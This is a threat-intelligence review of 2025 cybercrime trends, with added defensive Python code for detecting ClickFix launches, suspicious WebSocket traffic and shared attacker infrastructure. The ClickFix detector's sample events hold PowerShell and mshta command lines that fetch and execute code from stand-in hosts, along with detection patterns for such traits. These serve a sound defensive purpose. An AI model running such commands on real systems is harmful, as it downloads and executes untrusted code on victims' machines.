Twelve Months of Fighting Cybercrime
An Endpoint Security Summary of 2025
Over the past twelve months, threat actors have changed their operational approach in ways previously unseen. For one, many threat actors (North Korean operators being the most prominent) are monitoring the same cyber threat intelligence platforms that defenders use to share indicators of compromise. Another change was the discovery that free-tier publishing platforms had been abused to build massive phishing operations spanning over 38,000 malicious subdomains.
2025 also saw artificial intelligence transition from theoretical threat to practical reality. AI has emerged as a force multiplier, with threat actors weaponizing large language models to scale attacks, generate convincing social engineering content, and automate previously manual processes.
Key Trends in 2025
This is a summary of the key high-level points of 2025.
AI Weaponization Across the Threat Spectrum: Artificial intelligence has matured from a theoretical threat to an operational accelerator for bad actors. Malicious large language models are models intentionally created without safety constraints to support cybercrime. They generate phishing emails, malware code, and automated attack workflows. Examples include runtime code generation in MalTerminal and CAPTCHA bypassing in AkiraBot. This has lowered the barrier to entry for both sophisticated and commodity attacks.
Threat Actors Monitoring Defensive Intelligence: North Korean operators and others are actively monitoring platforms like Validin and VirusTotal to detect exposure of their own infrastructure in near real time, as well as to look for potential targets. Validin is a DNS intelligence platform, and VirusTotal is an online service that analyzes suspicious files, URLs, domains, and IP addresses using over 70 antivirus engines and URL/domain blacklists.
Industrial-Scale Cryptocurrency & Credential Theft: Highly organized, business-like criminal operations such as FreeDrain and PXA Stealer prove that cryptocurrency and credential theft at scale has evolved into a professional sector with sophisticated infrastructure and monetization pipelines. FreeDrain is a global, industrial-scale cryptocurrency phishing operation that has been active for years, primarily targets cryptocurrency wallets, and is growing every month. PXA Stealer is password-stealing malware that takes passwords and cookies from web browsers, credentials for VPN and FTP clients, and various forms of data from digital wallets, Discord, and cloud file-sharing applications. Credential theft is even being offered as a malware-as-a-service product.
Ransomware’s Relentless Business Model Evolution: The ransomware ecosystem saw innovations like DragonForce’s “white-label” branding service, a way to further commoditize its ransomware products. DragonForce offers subscribers the ability to build multiple variants of the DragonForce ransomware tailored to specific platforms, including Windows, Linux, ESXi, and NAS systems. With the convergence of hacktivist and profit motivations and the blurring of distinct ransomware families, these groups are becoming harder to track as they evolve.
Exploitation of Legitimate Platforms: Threat actors have increasingly leveraged trusted infrastructure for malicious purposes: Telegram for C2 and data monetization, free-tier publishing platforms for phishing campaigns, and cloud services for hosting and evasion. One such example is FreeDrain, which uses SEO manipulation, free-tier web services like gitbook.io, webflow.io, and github.io, and layered redirection techniques to target cryptocurrency wallets. Over the last few years it has expanded into a global cryptocurrency phishing operation.
China’s Hidden Offensive Capabilities: Research into Hafnium-linked companies and firms that provide Censorship as a Service to government customers has revealed deep integration between China’s private cybersecurity sector and state offensive operations. Hafnium is a cyber espionage group, commonly classified as an advanced persistent threat (APT), with alleged ties to the Chinese government, particularly its Ministry of State Security. Hafnium employs many contract “hackers” and has a web of resources at its disposal operating all over the world.
Developments in Social Engineering: Through ClickFix techniques such as fake CAPTCHA pages, and increasingly convincing fake job offers, threat actors have found new ways to exploit user psychology to deliver malware. In ClickFix, attackers trick users into executing malicious code themselves, often by posing as a “fix” for a browser error or as a human verification step. It is designed to bypass security defenses by using legitimate, trusted system tools.
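Because ClickFix relies on the victim launching a trusted interpreter from the desktop shell, the parent/child relationship in process-creation telemetry is where defenders usually catch it. The following is an added example (not code from the original article) of such a rule run over constructed Sysmon-like events; the field names, the interpreter list, the indicator patterns and the .test domains are all assumptions chosen for illustration.

```python
"""Flag ClickFix-style launches in process-creation telemetry.

Added example, not code from the original article. The events are
constructed in a Sysmon-like shape; the field names, the interpreter list
and the indicator patterns are assumptions chosen for illustration.
"""
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]

# Constructed process-creation events (a subset of Sysmon Event ID 1 fields).
EVENTS: List[Event] = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://verify-captcha.test/s | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://check-human.test/verify.hta"},
    {"ParentImage": r"C:\Program Files\Vendor\build-agent.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\ci\deploy.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad C:\Users\a\notes.txt"},
]

# Interpreters a ClickFix lure typically has the victim paste into the Run box.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Command-line traits that, combined with an interactive shell parent, warrant review.
INDICATORS: List[Tuple[re.Pattern, str]] = [
    (re.compile(r"\b(iwr|invoke-webrequest|downloadstring|curl|wget)\b", re.I), "remote fetch"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "inline execution"),
    (re.compile(r"-(w|window|windowstyle)\s+hidden\b", re.I), "hidden window"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\s+\S", re.I), "encoded command"),
    (re.compile(r"https?://", re.I), "URL in command line"),
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: Event) -> List[str]:
    """Reasons this event matches the rule; an empty list means no match."""
    # The rule is scoped to launches from the interactive shell (Run dialog,
    # desktop), which is how a pasted ClickFix command enters the system.
    if basename(event["ParentImage"]) != "explorer.exe":
        return []
    if basename(event["Image"]) not in INTERPRETERS:
        return []
    return [label for rx, label in INDICATORS if rx.search(event["CommandLine"])]


def detect(events: List[Event]) -> List[Tuple[Event, List[str]]]:
    """Return (event, reasons) for every event the rule matches."""
    hits = []
    for event in events:
        reasons = score_event(event)
        if reasons:
            hits.append((event, reasons))
    return hits


if __name__ == "__main__":
    for event, reasons in detect(EVENTS):
        print(f"{basename(event['ParentImage'])} -> {basename(event['Image'])}: {', '.join(reasons)}")
```

The scoping to an explorer.exe parent is what keeps the rule quiet: the same PowerShell flags launched by a build agent or a management tool are not flagged, while a user-pasted one-liner that fetches and executes remote content matches on several traits at once.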
Month by Month Highlights
This section summarizes notable monthly activity in 2025.
January
It was uncovered that the HellCat and Morpheus ransomware operations were essentially two distinct brands deploying identical ransomware payloads, illustrating the commoditization and rebranding practices within the RaaS ecosystem. This finding provided more understanding of how common code is sourced and shared across ransomware groups, which can improve detection efforts and enrich threat intelligence on their operations.
February
The analysis of leaked data from TopSec, a Beijing-based cybersecurity firm, revealed how China’s private sector provides Censorship as a Service to enforce government content monitoring. The leaked work logs showed TopSec delivering bespoke monitoring services to a state-owned enterprise precisely when a corruption investigation was announced, offering rare insight into public-private coordination for managing sensitive events and controlling public opinion in China. This analysis reveals how China’s private cybersecurity sector directly enables state surveillance and censorship operations, highlighting the interconnected nature of commercial security firms and government offensive capabilities.
March
It was found that ReaderUpdate, a macOS malware loader that had been largely dormant since 2023, had been updated. New samples showed the threat actors had expanded the loader’s capabilities by adding Go to its existing arsenal of Crystal, Nim, and Rust variants, creating a “melting pot” of macOS malware designed to evade detection through diverse implementation languages. ReaderUpdate’s use of multiple programming languages presents unique challenges for detection and analysis; it requires detection strategies that focus on behavior and artifacts rather than language-specific signatures.
April
AkiraBot was discovered: an AI-powered Python framework that uses OpenAI to generate custom spam messages targeting website contact forms and chat widgets. AkiraBot’s AI-generated content bypasses traditional spam filters by creating a unique message for each target, exposing the challenges AI poses to traditional website spam defenses.
May
FreeDrain was discovered through an investigation that started with a $500,000 theft. Collaborative efforts exposed an industrial-scale cryptocurrency phishing operation using SEO manipulation and over 38,000 distinct subdomains across free publishing platforms. FreeDrain’s abuse of thousands of subdomains on trusted free-tier platforms demonstrates that without stronger default safeguards, identity verification, or proper abuse response infrastructure, free publishing platforms will continue to be abused, undermining user trust and inflicting real-world financial harm.
June
Katz Stealer, an emerging Malware-as-a-Service platform targeting credentials and crypto assets, became widespread. A malicious version of the Termius SSH client was released that contained the macOS.ZuRu malware with a modified Khepri C2 framework concealed inside. DPRK activity was also observed with the macOS NimDoor malware family, a Nim-based backdoor specifically designed to target Web3 and crypto platforms on Mac endpoints. This is a notable shift, as attackers are now targeting what was once considered an obscure tool set.
July
Following Department of Justice indictments of two hackers working for China’s Ministry of State Security, it was found that these individuals filed ten patents under previously registered companies linked to the Hafnium group for highly intrusive forensics and data collection technologies. This shows that understanding the companies behind attacks and their documented capabilities, not just observed behavior, is essential for comprehensive threat intelligence.
August
Collaborative efforts exposed the PXA Stealer campaign, a Python-based operation that had infected more than 4,000 unique victims across 62 countries. The stolen data included over 200,000 passwords, hundreds of credit card records, and more than 4 million browser cookies, and was monetized through a Vietnamese-speaking cybercriminal ecosystem using Telegram APIs. Stealer campaigns have become increasingly automated and supply-chain integrated. PXA Stealer exemplifies a growing trend in which legitimate infrastructure is weaponized at scale.
September
Another collaborative effort exposed how the North Korean threat actors behind the Contagious Interview campaign were actively monitoring cyber threat intelligence platforms to detect infrastructure exposure. The research revealed coordinated teams using Slack for real-time collaboration and rapidly deploying replacement infrastructure when services took down their assets.
October
It was found that threat actors used emails impersonating the Ukrainian President’s Office carrying weaponized PDFs, luring victims into executing malware via a “ClickFix”-style fake Cloudflare CAPTCHA page. The final payload was a multi-stage WebSocket RAT, hosted on Russian-owned infrastructure, with an array of offensive features including arbitrary remote command execution, data exfiltration, and the potential deployment of additional malware. User awareness training on “ClickFix”-style social engineering techniques can help prevent attacks using this infection vector. TLS inspection is also a useful tool for catching these downloads. XDR can also help network security teams monitor for WebSocket connections to recently registered or suspicious domains.
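The last recommendation above, watching for WebSocket upgrades to recently registered or unknown domains, is straightforward to run over proxy logs. This is an added example (not code from the original article): the log format, the sample lines, the registration dates, the 30-day threshold and the allowlist are all constructed assumptions; a real deployment would pull creation dates from a registration-data source and use a proper public-suffix list.

```python
"""Flag WebSocket upgrades to young or unknown domains in proxy logs.

Added example, not code from the original article: the log format, the
sample lines, and the registration dates below are all constructed.
"""
from datetime import date, datetime
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Constructed proxy log lines:
# "<timestamp> <client> <method> <url> <status> <Upgrade header or '-'>"
SAMPLE_LOG = """\
2025-10-07T09:12:01Z 10.0.4.21 GET https://chat.example-corp.test/socket 101 websocket
2025-10-07T09:13:45Z 10.0.4.21 GET http://update-check.cf-verify-2025.test/ws 101 websocket
2025-10-07T09:14:02Z 10.0.4.33 GET https://www.example-news.test/index.html 200 -
2025-10-07T09:15:10Z 10.0.4.33 GET wss://api.fresh-cdn-node.test/stream 101 websocket
"""

# Constructed WHOIS-style creation dates; a real deployment would query a
# registration-data source for each new registrable domain it sees.
REGISTRATIONS: Dict[str, date] = {
    "example-corp.test": date(2015, 3, 2),
    "cf-verify-2025.test": date(2025, 9, 30),
    "example-news.test": date(2010, 1, 15),
}

# Domains the organization operates or explicitly trusts for WebSocket traffic.
ALLOWLIST = {"example-corp.test"}

MAX_AGE_DAYS = 30                     # younger than this is "recently registered"
ANALYSIS_DATE = date(2025, 10, 7)     # the day the sample log was taken


def registrable_domain(host: str) -> str:
    """Last two labels of a hostname (assumes no multi-label public suffix)."""
    labels = host.lower().split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def parse_line(line: str) -> dict:
    """Split one constructed log line into a typed event record."""
    ts, client, method, url, status, upgrade = line.split()
    return {
        "ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
        "client": client,
        "method": method,
        "url": url,
        "host": urlsplit(url).hostname or "",
        "status": int(status),
        "websocket": upgrade.lower() == "websocket",
    }


def classify(event: dict, today: date) -> Optional[str]:
    """Reason the WebSocket event is suspicious, or None if it is not."""
    if not event["websocket"]:
        return None
    domain = registrable_domain(event["host"])
    if domain in ALLOWLIST:
        return None
    created = REGISTRATIONS.get(domain)
    if created is None:
        return "no registration record"
    age = (today - created).days
    if age < MAX_AGE_DAYS:
        return f"domain registered {age} days ago"
    return None


def flag_websocket_events(log_text: str, today: date = ANALYSIS_DATE) -> List[dict]:
    """Parse every log line and keep the WebSocket upgrades that need a look."""
    flagged = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_line(line)
        reason = classify(event, today)
        if reason:
            flagged.append({**event, "reason": reason})
    return flagged


if __name__ == "__main__":
    for hit in flag_websocket_events(SAMPLE_LOG):
        print(f"{hit['ts'].isoformat()} {hit['client']} -> {hit['host']}: {hit['reason']}")
```

Only the 101 Switching Protocols responses are examined, so ordinary browsing is never scored; a domain with no registration record is treated as equally worth a look as a freshly registered one, since the absence of data is itself a signal when the organization already allowlists the WebSocket endpoints it expects.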
November
In a win for the good guys, researchers showed how modern intelligence platforms can accelerate the identification of threat campaigns through infrastructure correlation and automated discovery techniques. Modern adversaries rotate domains and replicate infrastructure templates, which limits the value of isolated indicators. Analysts need time-aware, cross-source analysis to identify shared traits and connect related assets.
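The core of that time-aware, cross-source analysis is a join on shared traits that only counts a match when both sightings were live at the same time. The following is an added example (not code from the original article or from any intelligence platform it mentions) that clusters constructed passive-DNS and certificate observations with a union-find; the record shape, the dates and the noisy-trait list are assumptions.

```python
"""Time-aware correlation of attacker infrastructure across sources.

Added example, not code from the original article. The passive-DNS and
certificate observations are constructed; the record shape is an assumption.
"""
from collections import defaultdict
from datetime import date
from typing import Dict, List, Set, Tuple

Observation = Tuple[str, str, str, date, date]  # domain, trait type, trait value, first seen, last seen

# Constructed observations. "ip" traits come from passive DNS, "cert" traits
# from a certificate transparency feed; the dates are the sighting window.
OBSERVATIONS: List[Observation] = [
    ("login-verify.test",  "ip",   "203.0.113.10",  date(2025, 10, 1),  date(2025, 10, 20)),
    ("secure-update.test", "ip",   "203.0.113.10",  date(2025, 10, 15), date(2025, 11, 2)),
    ("secure-update.test", "cert", "sha256:AAAA",   date(2025, 10, 15), date(2025, 11, 2)),
    ("cdn-refresh.test",   "cert", "sha256:AAAA",   date(2025, 10, 28), date(2025, 11, 10)),
    ("old-tenant.test",    "ip",   "203.0.113.10",  date(2024, 1, 1),   date(2024, 3, 1)),
    ("unrelated.test",     "ip",   "198.51.100.7",  date(2025, 10, 5),  date(2025, 11, 1)),
    ("shared-host-a.test", "ip",   "198.51.100.99", date(2025, 10, 5),  date(2025, 11, 1)),
    ("shared-host-b.test", "ip",   "198.51.100.99", date(2025, 10, 6),  date(2025, 11, 1)),
]

# Traits too common to be evidence on their own (e.g. a shared-hosting IP).
NOISY_TRAITS = {("ip", "198.51.100.99")}


def overlaps(a_first: date, a_last: date, b_first: date, b_last: date) -> bool:
    """True when the two sighting windows intersect."""
    return a_first <= b_last and b_first <= a_last


class DisjointSet:
    """Union-find over domain names."""
    def __init__(self) -> None:
        self.parent: Dict[str, str] = {}

    def find(self, x: str) -> str:
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]  # path halving
            x = self.parent[x]
        return x

    def union(self, a: str, b: str) -> None:
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[rb] = ra


def correlate(observations: List[Observation]):
    """Cluster domains that shared a trait while both were live.

    Returns (clusters, edges): clusters is a list of domain sets, largest
    first; edges records which shared trait linked each pair.
    """
    by_trait: Dict[Tuple[str, str], List[Tuple[str, date, date]]] = defaultdict(list)
    for domain, ttype, tval, first, last in observations:
        if (ttype, tval) in NOISY_TRAITS:
            continue
        by_trait[(ttype, tval)].append((domain, first, last))

    ds = DisjointSet()
    edges = []
    for trait, entries in by_trait.items():
        for i, (d1, f1, l1) in enumerate(entries):
            for d2, f2, l2 in entries[i + 1:]:
                # The same IP years apart is a reused address, not shared infrastructure.
                if d1 != d2 and overlaps(f1, l1, f2, l2):
                    ds.union(d1, d2)
                    edges.append((d1, d2, trait))

    clusters: Dict[str, Set[str]] = defaultdict(set)
    for domain in {o[0] for o in observations}:
        clusters[ds.find(domain)].add(domain)
    ordered = sorted(clusters.values(), key=lambda s: (-len(s), sorted(s)))
    return ordered, edges


if __name__ == "__main__":
    groups, links = correlate(OBSERVATIONS)
    for group in groups:
        print(sorted(group))
    for d1, d2, trait in links:
        print(f"{d1} <-> {d2} via {trait[0]} {trait[1]}")
```

In the constructed data, login-verify.test and cdn-refresh.test never share a trait directly, yet they land in one cluster because secure-update.test overlapped each of them in time on a different source; old-tenant.test, which sat on the same IP a year earlier, stays out, and the two domains on the shared-hosting address are not linked at all.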
December
Analysis of large language models found that while LLMs are being adopted by cybercriminals, they currently serve as operational accelerators rather than revolutionary tools, streamlining reconnaissance, improving phishing, and speeding up attack stages without fundamentally changing ransomware methodology. With today’s LLMs, the risk is not superintelligent malware but industrialized extortion, requiring defenders to adapt to a faster operational tempo rather than to novel capabilities.
Conclusion
Artificial intelligence has emerged not as a game-changer but as a force multiplier on the threat landscape. Meanwhile, cybercriminals run industrial-scale operations with professional infrastructure, business hours, and customer service models much like legitimate enterprises. Nation-state actors monitor the same intelligence platforms defenders use, turning the information security community’s own tools into reconnaissance resources.
With an adversary landscape in which attribution has become increasingly complex and the line between hacktivist and profit-motivated operations continues to blur, enterprise security will have to adapt just as quickly.
A layered model is still highly recommended. At a minimum, it should have the following features.
End User Training: The end user is the first line of defense, but also the most vulnerable. End user training must be deployed and enforced.
Secure Edge Solutions: The shift from the centralized corporate office to working from home has extended the security perimeter to wherever the user is, which has essentially made credentials the perimeter. Secure edge solutions provide consistent security policies for hybrid work, replace complex VPNs, and protect against modern threats using zero-trust, cloud-native frameworks that extend the concepts of a firewall down to the mobile endpoint. These include MFA, network security, and web proxies to inspect traffic.
EDR/XDR and the SOC: Endpoint protection and security operations center monitoring are key components of any protection plan. Having more than one EDR/XDR solution is also becoming more common.
Firewall: All offices must have the protection of a modern firewall that incorporates real-time AI/ML-powered antivirus for the in-line detection of ransomware and zero-day attacks. This can include anti-phishing, anti-spam, anti-virus, and anti-bot capabilities. Intrusion Prevention Systems (IPS), SSL/TLS encrypted traffic inspection, and application-level awareness to block high-risk apps are also important. It must also be able to enforce least-privileged access, including access based on user identity.
Identity Protection: Multifactor Authentication (MFA) must be used on all capable applications to add a layer of security beyond passwords. If applications support it, SAML integrations should be performed with the company directory to reduce administration overhead, secure the application, and simplify login. Password management is equally important. Using unique, complex passwords for every account via a proper password manager is the best way to accomplish this.
This article summarizes cyber activity reported on by SentinelOne SentinelLabs. Their original sources can provide more detail for readers who wish to dive deeper into the mentioned subjects. To start, refer to this article from SentinelOne SentinelLabs.